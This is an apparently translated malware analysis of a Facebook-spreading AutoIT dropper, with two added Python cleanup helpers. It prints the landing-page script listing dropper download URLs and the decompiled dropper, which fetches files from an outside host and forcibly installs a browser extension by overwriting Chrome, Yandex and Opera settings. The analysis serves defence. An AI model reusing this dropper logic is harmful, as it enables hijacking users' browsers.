Analysis of malware spreading on Facebook


- Symptoms:
1. A message is sent to the victim's Facebook friend list, with a link as its content.
2. Clicking the link downloads an .EXE file to the computer.
3. Once the file is run, the computer is infected and goes on sending the messages.

The link has the following form:
https://9b102c9132fc2995f11f-90f5b1ca4ed410dd209886f93c61da67.ssl.cf5.rackcdn.com/LK8Y5CjfjK0LOBZufflKwJRclfKMcl5ip4WamgLE.html#ref=93740

The incoming message shows the recipient's own avatar.

// Landing page script: identically named dropper binaries hosted in several
// S3 buckets; one of them is handed out on each visit.
var exeler = [
"https://s3-us-west-2.amazonaws.com/yeslanw232323sdsdsd2sds13/video_watching_mp4_facebook_12222333232122233sd29000421003.exe",
"https://s3-us-west-2.amazonaws.com/sadask2323s/video_watching_mp4_facebook_1222233323212233sd29000421003.exe",
"https://s3-us-west-2.amazonaws.com/sadsak2k323s/video_watching_mp4_facebook_122223332322233sd2900042003.exe",
"https://s3-us-west-2.amazonaws.com/sadsadk21k323s/video_watching_mp4_facebook_1222323222332900042003.exe",
"https://s3-us-west-2.amazonaws.com/bakbakbak323/video_watching_mp4_facebook_122223332322233sd29000421003.exe",
"https://s3-us-west-2.amazonaws.com/sadsad21323ss/video_watching_mp4_facebook_133290004003.exe",
"https://s3-us-west-2.amazonaws.com/sdskdk213s/video_watching_mp4_facebook_12233290004003.exe",
"https://s3-us-west-2.amazonaws.com/bakbakwsd21323/video_watching_mp4_facebook_122332900042003.exe",
"https://s3-us-west-2.amazonaws.com/23sds123s/video_watching_mp4_facebook_12222332900042003.exe"];
// Pick one of the URLs at random for this visit.
var exem = exeler[Math.floor(Math.random() * (exeler.length))];

So it automatically downloads one of the files above to the computer, and whoever runs it installs it on their own machine. So far I have encountered at least 2 samples of this type infecting computers. This malware is written in AutoIT. Reversing it, we get:

; String-building obfuscation: "Chrome", "browser" (browser.exe, the Yandex Browser
; executable) and "Extensions" are assembled one character at a time so the plain
; strings do not show up in the binary.
Local $chrxxxx1 = "C"
Local $chrxxxx2 = "h"
Local $chrxxxx3 = "r"
Local $chrxxxx4 = "o"
Local $chrxxxx5 = "m"
Local $chrxxxx6 = "e"
Local $chrxxxx = $chrxxxx1 & $chrxxxx2 & $chrxxxx3 & $chrxxxx4 & $chrxxxx5 & $chrxxxx6
Local $browxs1 = "b"
Local $browxs2 = "r"
Local $browxs3 = "o"
Local $browxs4 = "w"
Local $browxs5 = "s"
Local $browxs6 = "e"
Local $browxs7 = "r"
Local $browxs = $browxs1 & $browxs2 & $browxs3 & $browxs4 & $browxs5 & $browxs6 & $browxs7
Local $extsd1 = "E"
Local $extsd2 = "x"
Local $extsd3 = "t"
Local $extsd4 = "e"
Local $extsd5 = "n"
Local $extsd6 = "s"
Local $extsd7 = "i"
Local $extsd8 = "o"
Local $extsd9 = "n"
Local $extsd0 = "s"
Local $extsd = $extsd1 & $extsd2 & $extsd3 & $extsd4 & $extsd5 & $extsd6 & $extsd7 & $extsd8 & $extsd9 & $extsd0
; Close any running browser so the profile files below can be overwritten.
If ProcessExists("" & $chrxxxx & ".exe") Then
ProcessClose("" & $chrxxxx & ".exe")
EndIf
If ProcessExists("" & $browxs & ".exe") Then
ProcessClose("" & $browxs & ".exe")
EndIf
If ProcessExists("opera.exe") Then
ProcessClose("opera.exe")
EndIf
Sleep(100)
; Fetch the extension ID from the control server, then create an extension folder
; with that ID in the Chrome, Yandex and Opera profiles, for both the Vista+ AppData
; layout and the XP-era "Documents and Settings" layout.
Local $okanid = BinaryToString(InetRead("http://www.patronbayi.com/class.php?idver=true"))
DirCreate(@UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)
; Stage the three extension files in %USERPROFILE%\file_shared_xs. InetGet option 9
; = force reload (1) + ignore SSL errors (8). The staged Preferences file is marked
; read-only; the result of that call is ignored (empty If block).
DirCreate(@UserProfileDir & "\file_shared_xs\")
Sleep(100)
InetGet("http://www.patronbayi.com/Preferences", @UserProfileDir & "\file_shared_xs\Preferences", 9)
Sleep(50)
If NOT FileSetAttrib(@UserProfileDir & "\file_shared_xs\Preferences", "+R") Then
EndIf
InetGet("http://www.patronbayi.com/ext/background.js", @UserProfileDir & "\file_shared_xs\background.js", 9)
InetGet("http://www.patronbayi.com/manifest.json", @UserProfileDir & "\file_shared_xs\manifest.json", 9)
; Copy the staged files into every browser profile. FileCopy option 9 = overwrite (1)
; + create the destination directory (8). Preferences replaces the browser's own
; settings file; background.js and manifest.json go into the new extension folder.
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)
Sleep(100)
; Relaunch Chrome with the modified profile.
ShellExecute("" & $chrxxxx & ".exe")
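To read this kind of string-building obfuscation without tracing every character by hand, here is an added Python helper (my own code for this write-up, not part of the post or of the sample) that folds the pure-string assignments and `&` concatenations of a decompiled AutoIT listing back into literals and rewrites the statements that use them. It assumes the decompiler output shape shown above (`Local $name = "x"` lines and `$a & $b` chains); expressions containing calls or macros such as `@UserProfileDir` are left as they are. The `SAMPLE` text embedded below is a constructed excerpt of the listing above.

```python
import re

# Constructed excerpt of the decompiled listing above: the string-building
# prologue for "Chrome" and "Extensions" plus a few statements that use them.
SAMPLE = r'''Local $chrxxxx1 = "C"
Local $chrxxxx2 = "h"
Local $chrxxxx3 = "r"
Local $chrxxxx4 = "o"
Local $chrxxxx5 = "m"
Local $chrxxxx6 = "e"
Local $chrxxxx = $chrxxxx1 & $chrxxxx2 & $chrxxxx3 & $chrxxxx4 & $chrxxxx5 & $chrxxxx6
Local $extsd1 = "E"
Local $extsd2 = "x"
Local $extsd3 = "t"
Local $extsd4 = "e"
Local $extsd5 = "n"
Local $extsd6 = "s"
Local $extsd7 = "i"
Local $extsd8 = "o"
Local $extsd9 = "n"
Local $extsd0 = "s"
Local $extsd = $extsd1 & $extsd2 & $extsd3 & $extsd4 & $extsd5 & $extsd6 & $extsd7 & $extsd8 & $extsd9 & $extsd0
If ProcessExists("" & $chrxxxx & ".exe") Then
ProcessClose("" & $chrxxxx & ".exe")
EndIf
Local $okanid = BinaryToString(InetRead("http://www.patronbayi.com/class.php?idver=true"))
DirCreate(@UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)
ShellExecute("" & $chrxxxx & ".exe")
'''

# "Local $name = <expr>" (the Local/Global/Dim keyword is optional in AutoIT).
ASSIGN_RE = re.compile(r'^\s*(?:(?:Local|Global|Dim)\s+)?(\$\w+)\s*=\s*(.+?)\s*$')
LITERAL_RE = re.compile(r'^"([^"]*)"$')     # a bare string literal (no '&' inside)
COLLAPSE_RE = re.compile(r'"\s*&\s*"')      # "abc" & "def"  ->  "abcdef"


def eval_concat(expr, env):
    """Evaluate an expression made only of string literals and already-resolved
    variables joined by '&'. Returns None if anything else appears (a function
    call, a macro, an unknown variable) so that line is left untouched."""
    out = []
    for part in (p.strip() for p in expr.split('&')):
        m = LITERAL_RE.match(part)
        if m:
            out.append(m.group(1))
        elif part in env:
            out.append(env[part])
        else:
            return None
    return ''.join(out)


def resolve_strings(source):
    """Walk the script top to bottom and fold every pure-string assignment into a
    name -> value map; chained concatenations resolve because their parts come first."""
    env = {}
    for line in source.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            value = eval_concat(m.group(2), env)
            if value is not None:
                env[m.group(1)] = value
    return env


def inline_strings(source, env):
    """Drop the folded assignments, substitute each resolved variable with its
    literal, then merge adjacent literals so "" & "Chrome" & ".exe" reads "Chrome.exe"."""
    out = []
    for line in source.splitlines():
        m = ASSIGN_RE.match(line)
        if m and m.group(1) in env:
            continue  # definition has been folded away
        for name, value in env.items():
            # (?!\w) keeps $chrxxxx from matching the prefix of $chrxxxx1
            line = re.sub(re.escape(name) + r'(?!\w)', lambda _m, v=value: '"' + v + '"', line)
        out.append(COLLAPSE_RE.sub('', line))
    return '\n'.join(out)


if __name__ == "__main__":
    names = resolve_strings(SAMPLE)
    print(names)                      # {'$chrxxxx1': 'C', ..., '$chrxxxx': 'Chrome', ..., '$extsd': 'Extensions'}
    print(inline_strings(SAMPLE, names))
```

Run against the full decompiled script the same way; the rewritten output reads `ProcessExists("Chrome.exe")` and `DirCreate(@UserProfileDir & "\AppData\Local\Google\Chrome\User Data\Default\Extensions\" & $okanid)`, which is what you want in a report.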

So it sends HTTP requests to:

www.patronbayi.com GET /class.php?idver=true HTTP/1.1
www.patronbayi.com GET /Preferences HTTP/1.1
www.patronbayi.com GET /ext/background.js HTTP/1.1
www.patronbayi.com GET /manifest.json HTTP/1.1

There are several different locations where the executable is stored, but the 2 locations I found are:

C:\TEST\sample.exe and
%appdata%sysreg.exe
C:\User\[username]\Program Data\sysreg.exe
C:\f_install.exe

Search for the .EXE files above and delete them, then look for the following directories:

C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Extensions
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser
C:\Documents and Settings\User\Local Settings\Application Data\Yandex
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome
C:\Documents and Settings\User\Local Settings\Application Data\Google
C:\Documents and Settings\User\file_shared_xs
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable
C:\Documents and Settings\User\Application Data\Opera Software
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable
C:\Documents and Settings\User\AppData\Roaming\Opera Software
C:\Documents and Settings\User\AppData\Roaming
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser
C:\Documents and Settings\User\AppData\Local\Yandex
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data
C:\Documents and Settings\User\AppData\Local\Google\Chrome
C:\Documents and Settings\User\AppData\Local\Google
C:\Documents and Settings\User\AppData\Local
C:\Documents and Settings\User\AppData

Delete the whole directory, or these 3 files: Preferences, background.js, manifest.json
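As an added example (my own script, not the cleanup tool the post mentions), here is a Python scanner that checks one user profile directory for the artefacts described above: the `file_shared_xs` staging folder, files named `sysreg.exe` or `f_install.exe`, and extension folders that hold `background.js` and `manifest.json` directly under `Extensions\<id>\`. The extension paths are the ones the DirCreate calls in the decompiled script create; the last check relies on the fact that a Chrome Web Store install keeps `manifest.json` under a version subfolder, whereas the dropper writes it straight into `Extensions\<id>\`. The profile tree built by `build_sample_tree` is constructed for the demo and contains no real malware.

```python
import os
import tempfile
from pathlib import Path

# Extension directories the dropper creates, relative to the user profile directory
# (from the DirCreate calls in the decompiled script: Vista+ and XP-era layouts).
EXTENSION_ROOTS = [
    "AppData/Local/Google/Chrome/User Data/Default/Extensions",
    "AppData/Local/Yandex/YandexBrowser/User Data/Default/Extensions",
    "AppData/Roaming/Opera Software/Opera Stable/Extensions",
    "Local Settings/Application Data/Google/Chrome/User Data/Default/Extensions",
    "Local Settings/Application Data/Yandex/YandexBrowser/User Data/Default/Extensions",
    "Application Data/Opera Software/Opera Stable/Extensions",
]
STAGING_DIR = "file_shared_xs"                    # staging folder used by the script
DROPPER_NAMES = {"sysreg.exe", "f_install.exe"}   # dropper file names listed in the post
DROPPED_FILES = {"background.js", "manifest.json"}


def scan_profile(user_profile):
    """Return the indicators found under one user profile directory, as POSIX-style
    paths relative to it: the staging folder, files with the dropper names, and
    extension folders holding background.js and manifest.json directly under
    Extensions/<id>/ (a Web Store install nests them under a version folder)."""
    root = Path(user_profile)
    found = {"staging_dirs": [], "dropper_files": [], "suspicious_extensions": []}
    if (root / STAGING_DIR).is_dir():
        found["staging_dirs"].append(STAGING_DIR)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() in DROPPER_NAMES:
                found["dropper_files"].append((Path(dirpath) / name).relative_to(root).as_posix())
    for ext_root in EXTENSION_ROOTS:
        ext_dir = root / ext_root
        if not ext_dir.is_dir():
            continue
        for ext_id in ext_dir.iterdir():
            if ext_id.is_dir() and all((ext_id / f).is_file() for f in DROPPED_FILES):
                found["suspicious_extensions"].append(ext_id.relative_to(root).as_posix())
    for key in found:
        found[key].sort()
    return found


def build_sample_tree(root):
    """Constructed profile layout for the demo: one dropped extension, one normally
    installed extension (manifest under a version folder), the staging folder and
    a file with a dropper name. Nothing here is real malware."""
    root = Path(root)
    dropped = root / EXTENSION_ROOTS[0] / "constructedextid0000000000000001"
    dropped.mkdir(parents=True)
    (dropped / "background.js").write_text("// constructed placeholder\n")
    (dropped / "manifest.json").write_text('{"name": "constructed"}\n')
    legit = root / EXTENSION_ROOTS[0] / "legitimateextid00000000000000002" / "1.2.3_0"
    legit.mkdir(parents=True)
    (legit / "manifest.json").write_text('{"name": "constructed, benign"}\n')
    (root / STAGING_DIR).mkdir()
    (root / STAGING_DIR / "Preferences").write_text("{}\n")
    (root / "AppData" / "Roaming").mkdir(parents=True)
    (root / "AppData" / "Roaming" / "sysreg.exe").write_bytes(b"constructed placeholder, not a PE")


def demo():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_profile(tmp)


if __name__ == "__main__":
    for key, items in demo().items():
        print(key, items)
```

On a real machine call `scan_profile` on each user profile (for example `C:\Users\<name>` and, on older systems, `C:\Documents and Settings\<name>`) and review the reported extension folders before deleting them; the scanner only reports, it does not remove anything.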

At present this malware sample keeps being updated to new versions. Keep following this topic for instructions on removing the virus. If necessary, I will write a program that removes the virus from the machine entirely, should many people get hit by this type.

Source: Hoàng Cường
